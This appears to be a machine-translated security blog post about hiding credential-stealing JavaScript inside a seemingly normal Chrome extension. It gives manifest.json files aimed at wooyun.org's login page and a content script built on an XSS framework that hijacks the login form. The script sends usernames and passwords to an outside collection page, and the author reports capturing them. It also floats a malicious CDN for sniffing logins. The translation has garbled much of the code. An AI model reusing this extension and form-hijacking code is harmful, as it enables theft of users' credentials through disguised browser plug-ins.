Using Chrome plug-ins to implant js into specified pages, hijack XSS, and some tricky ideas and practices

0x00 ChromePlug-ins
--------------------------
This idea came to mind when I saw @ Zi mengxiao's post yesterday.
The idea is as follows:
The Chrome plug-in can be controlled by manifest. json to implant scripts in contentscript. js to a specified page. So, can we place a small function in a seemingly normal plug-in: <script src = // xsser. me> </script> on all wooyun pages?
Then, start to practice. (For convenience, just a small box is displayed ).
Manifest. json content:

{  "name": "XiaoChaJian",  "version": "1.0",  "manifest_version": 2,  "author":"VIP",  "icons": {      "128": "icon.png"   },  "permissions": [    "tabs","http://*/*","https://*/*"  ],  "content_scripts": [    {"js":["contentscript.js"],"matches": ["http://wooyun.org/*","http://*.wooyun.org/*"]}   ]}

 

Contentscript. js content:
Alert (/xss /);


After changing the pop-up box to xsser. me, can I intercept the expected cookies?
Unfortunately, this method does not work in wooyun because the cookies of wooyun are HTTP-ONLY. Although the plug-in can also obtain http-only cookies (like the Edit this cookie and cookie quick simulation), it is very troublesome, so another cool idea came into being: on the logon page of wooyun, insert @ Sogili's xss. if Javascript is used to hijack the form, can we send the user name and password to the desired place?
Practice:
Manifest. json content:

{"Name": "JieChiBiaoDan", "version": "1.0", "manifest_version": 2, "author": "VIP", "icons": {"128 ": "icon.png"}, "permissions": ["tabs", "http: // */*", "https: // */*"], "content_scripts ": [{"js": ["contentscript. js "]," matches ":[" http://wooyun.org/user.php ? Action = login *"," http://www.wooyun.org/user.php?action=login * "]} Contentscript. js content:; var xss = function () {var x = {'name': 'xss. js', 'version': '0. 2.1 ', 'author': 'Long short (sogili)'}; x. x = function (id) {return document. getElementById (id)}; // error tolerance value x. e = function (_) {try {return eval ('+ _ +')} catch (e) {return ''}; // browser x. I = {I :!! Self. ActiveXObject & (function () {for (var v = 6, s = document. createElement ('s '); s. innerHTML =' <! [If gt IE '+ (v ++) +']> <I> </I> <! [Endif] --> ', s. getElementsByTagName (' I ') [0];); return v ;}(), c :!! Self. chrome, f: self. parse paintcount>-1, o :!! Self. opera, s :! Self. chrome &&!! Self. webKitPoint}; // UA x. ua = navigator. userAgent; // determines whether the device is an apple handheld device x. apple =/ip (one | ad | od)/I. test (x. ua); // random number x. rdm = function () {return ~~ (Math. random () * 1e5)}; // url encoding (UTF8) x. ec = encodeURIComponent; x.html = function () {return document. getElementsByTagName ('html') [0] | document. write ('

Http://vip.yupage.com/wy.php:















Start the test. Open the logon page, fill in the username and password verification code, and click log on. The POST will be initiated like my receiving page before the POST will be dark clouds.



Let's take a look. the user name and password are already there.



Without knowing it, the user name and password are hijacked. The wb transfer function of wooyun is not verified twice.


0x01 CDN

---------------

Many websites now use CDN to accelerate/defend against DDoS attacks.

I searched for the working principle of CDN, which is probably like this.

User Access-automatically allocates the fastest node-Requests the original server -------

Return to user-returned to node server-returned data from original server <-|

So can we build a malicious CDN and then sniff the username and password of all websites using the CDN?